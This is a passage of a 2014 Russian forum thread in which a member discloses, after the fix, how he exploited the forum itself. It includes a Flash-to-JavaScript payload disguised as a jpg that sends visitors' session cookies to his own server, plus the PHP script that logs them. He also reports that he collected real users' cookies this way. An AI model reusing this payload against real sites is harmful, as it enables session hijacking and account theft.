Войти
ФлеймФорумОбщее

Уязвимость. (3 стр)

Advanced: Тема повышенной сложности или важная.

Страницы: 1 2 3 4 Следующая »
#30
13:35, 10 фев. 2014

все целы все живы, расходимся.


#31
13:49, 10 фев. 2014

Велком ту май профиль. Я новую нашёл )))

#32
13:57, 10 фев. 2014

NightmareZ

hacked.


А чего именно Хакед?

#33
13:59, 10 фев. 2014

Pathetic Mike
> А чего именно Хакед?
Незалогиненным зашёл? Ко мне от тебя пустые куки прилетели.

> А чего именно
Ну как чего? Надо ж какой-то месседж бокс показать, что мол работает ещё.

#34
14:00, 10 фев. 2014

NightmareZ
> Незалогиненным зашёл? Ко мне от тебя пустые куки прилетели.

Залогинен на фаерфоксе

#35
14:02, 10 фев. 2014

Я Hardcode. Ну почти ;)

#36
14:21, 10 фев. 2014

И тут, кажется, пофиксили.

#37
14:22, 10 фев. 2014

NightmareZ
Молодец, добавил тебе участника на год.

#38
14:23, 10 фев. 2014

wat
> Молодец, добавил тебе участника на год.
Спасибо :)

#39
14:34, 10 фев. 2014

Так вот почему NightmareZ, создав вчера тему про какой-то веб интерфейс который превращал в пароле угловые скобки в lt gt и, видимо, заметив, что тут они не экранируются, написал матерное сообщение и удалил тему.

#40
14:52, 10 фев. 2014

=A=L=X=
> Надеюсь после фикса вектор атаки будет опубликован?
Вобщем, как я это сделал уже понятно. Но теперь в подробностях.
Я сделал простую флешку-однострочник (не считая служебного мусора):

ExternalInterface.call('eval', '(function() { var s=document.cookie; var st=s.indexOf("=")+1; s=s.substr(st, s.indexOf(";")-st); var i = document.createElement("img"); i.src="http://reaper.nightmarez.net/getter.php?cookie=" + s; })();');
, где ExternalInterface.call позволяет вызывать внешний код на JavaScript. Первым параметром передаётся имя джаваскриптовой функции, а дальше — её аргументы.
Джаваскриптовая функция eval принимает в качестве аргумента строку и выполняет её. То есть по сути из флеша я вызвал такой js-код:
(function() { var s=document.cookie; var st=s.indexOf("=")+1; s=s.substr(st, s.indexOf(";")-st); var i = document.createElement("img"); i.src="http://reaper.nightmarez.net/getter.php?cookie=" + s; })();
А теперь в человеческом виде:
(function() {
    // получаем куки
    var s = document.cookie;

    // из кук вида SID=12345; выдёргиваем само значение
    var st = s.indexOf("=") + 1; 
    s = s.substr(st, s.indexOf(";") - st);

    // создаём тег IMG
    var i = document.createElement("img");

    // задаём ему сорц, чтобы браузер дёрнур мой PHP скрипт, передав ему в качестве GET-параметра значение куки
    i.src="http://reaper.nightmarez.net/getter.php?cookie=" + s;
})();
Похапэ код тоже не отличается сложностью:
<?
    $s = $_GET['cookie'];
    $f = fopen('results.txt', 'a');
    fputs($f, $s . "\n");  
    fclose($f);
?>
просто пишет полученные данные в файл на сервере.

Далее я взял флешку и искал, куда бы её присунуть. Нашёл место в профиле, там, где загружается картинка и потом в каталоге сайтов — можно загрузить вместо иконки. Естесственно, нужно расширение поменять с swf, например, на jpg.
Ну а потом вставляем embedded... тоже не везде работало. В постах не работало. В профиле работало. Ну и затем кинул линк в горячо обсуждаемую тему о олимпиаде и мне сразу посыпались куки на сервер.

entryway
> Так вот почему NightmareZ, создав вчера тему про какой-то веб интерфейс который превращал в пароле угловые скобки в lt gt и заметив, что они не экранируются и тут, написал матерное сообщение и тут же удалил тему.

Это совсем другая тема. На роутере ZyXEL Keenetic в веб интерфейсе на последней версии прошивки есть бага. Если ввести пароль с угловыми скобками, то потом не сможешь с ним зайти. Насколько я понял, там такая фигня, что пароль сохраняется в открытом виде. И не просто сохраняется, а при вводе пароля при попытке логирования угловые скобки заменяются на эскейп-последовательности и уже в таком виде сравнивается с тем, что ты вводишь. И если рутовый пароль хотя бы закрывают звёздочками, то пароль на WiFi так в открытом виде тебе потом и показывают. Вот ввёл ты, например, abc>def , зашёл в следующий раз, а там написан пароль abc&g t;def

Я хотел выругаться на этом форуме по этому поводу, но тут мне &g t; заменили на >, я проматерился в слух и пошёл по своим делам, удалив тему.

#41
14:55, 10 фев. 2014

NightmareZ
> На роутере ZyXEL

Я хотел написать по поводу пользования Зухелями в наше время. Но не стал, поберег себя от раздачи банов :)

#42
15:00, 10 фев. 2014

NightmareZ
Ну ты крут, че сказать!

#43
15:16, 10 фев. 2014

TarasB
> Подтверждаю, комментарий №1 не мой.
он просто разместил объяву

#44
15:19, 10 фев. 2014

NightmareZ
> Ну а потом вставляем embedded... тоже не везде работало. В постах не работало.
> В профиле работало.

О как. Любопытно...

Страницы: 1 2 3 4 Следующая »
ФлеймФорумОбщее

Тема в архиве.

Тема закрыта.